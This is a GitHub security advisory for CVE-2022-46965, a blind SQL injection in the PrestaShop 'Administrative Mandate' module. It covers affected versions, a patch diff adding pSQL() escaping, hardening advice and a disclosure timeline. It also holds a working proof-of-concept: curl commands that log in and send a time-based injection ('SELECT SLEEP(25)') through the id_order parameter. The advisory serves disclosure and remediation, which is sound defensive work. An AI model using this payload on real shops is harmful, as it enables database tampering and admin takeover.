Skip to content

Improper neutralization of an SQL parameter in Administrative Mandate payment module for PrestaShop

High
clotairer published GHSA-hg7m-23j3-rf56 Jan 28, 2023

Package

totadministrativemandate (PrestaShop)

Affected versions

>= 1.2.1, < 1.7.2

Patched versions

1.7.2

Description

In the module "Administrative Mandate" (totadministrativemandate) edited by 202 ecommerce, an authenticated user can perform SQL injection in affected versions.

Description

From version 1.2.1 published on 12 October 2012 to 1.7.2 published on 3 December 2020, a sensitive SQL calls in class PDFMandate::mandatePDF() (or pdftot::MandatePDF() for older version before 1.5) can be executed with a trivial http call and exploited to forge a blind SQL injection.

Possible malicious usage

  • Obtain admin access
  • Remove data on the associated PrestaShop

Proof of concept

curl -v --cookie-jar cookie.txt 'https://domain.tld/authentification?submitLogin=1&emailXXXX&password=YYY && \
curl -v --cookie cookie.txt 'https://domain.tld/modules/totadministrativemandate/pdftot.php?id_order=1%27%3BSELECT%20SLEEP%2825%29%23'

Sample patch for 1.6.2

--- a/totadministrativemandate/pdfmandate15.php
+++ b/totadministrativemandate/pdfmandate15.php
@@ -1166,15 +1166,15 @@ class PDFMandate extends FPDF
         $mode = 'D';
         $slip = false;
         $delivery = false;
        $reference = Tools::getValue('id_order');

        if (version_compare(_PS_VERSION_, '1.5', '>')) {
-            $SQL = 'SELECT `id_order` FROM `'._DB_PREFIX_."orders` WHERE `reference` = '".$reference."' ";
+            $SQL = 'SELECT `id_order` FROM `'._DB_PREFIX_."orders` WHERE `reference` = '".pSQL($reference)."' ";
            $id_order = Db::getInstance()->getValue($SQL);
        } else {
            $id_order = Tools::getValue('id_order');
        }
        $order = new Order($id_order);
 
        if (
            !Validate::isLoadedObject($order)

--- a/totadministrativemandate/pdfmandate16.php
+++ b/totadministrativemandate/pdfmandate16.php
@@ -345,15 +345,15 @@ class PDFMandate extends TCPDF
         $mode = 'D';
         $slip = false;
         $delivery = false;
        $reference = Tools::getValue('id_order');

        if (version_compare(_PS_VERSION_, '1.5', '>')) {
-            $SQL = 'SELECT `id_order` FROM `'._DB_PREFIX_."orders` WHERE `reference` = '".$reference."' ";
+            $SQL = 'SELECT `id_order` FROM `'._DB_PREFIX_."orders` WHERE `reference` = '".pSQL($reference)."' ";
            $id_order = Db::getInstance()->getValue($SQL);
        } else {
            $id_order = Tools::getValue('id_order');
        }
        $order = new Order($id_order);
 
        if (
            !Validate::isLoadedObject($order)

Other recommandations

  • It’s recommended to upgrade the module beyong 1.7.2.
  • Upgrade PrestaShop up to 1.7.8.8 to disable multi-query executions (separated by ";").
  • Change the default database prefix ps_ by a new longer arbitrary prefix.

Links

Timeline

Date Action
2022-09-26 Issue discovered by Touch Web during a code reviews
2022-09-26 Contact 202 ecommerce
2022-09-26 202 ecommerce answered with scope of release affected and confirm new release are fixed 2 years ago
2022-12-05 Request a CVE ID
2023-01-21 Obtain the CVE ID from mitre.org
2023-01-30 Publish this advisory

202 ecommerce thanks Touch Web for its courtesy and its help after the vulnerability disclosure.

Severity

High
8.3
/ 10

CVSS base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
Low
User interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
Low
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L

CVE ID

CVE-2022-46965

Weaknesses

Credits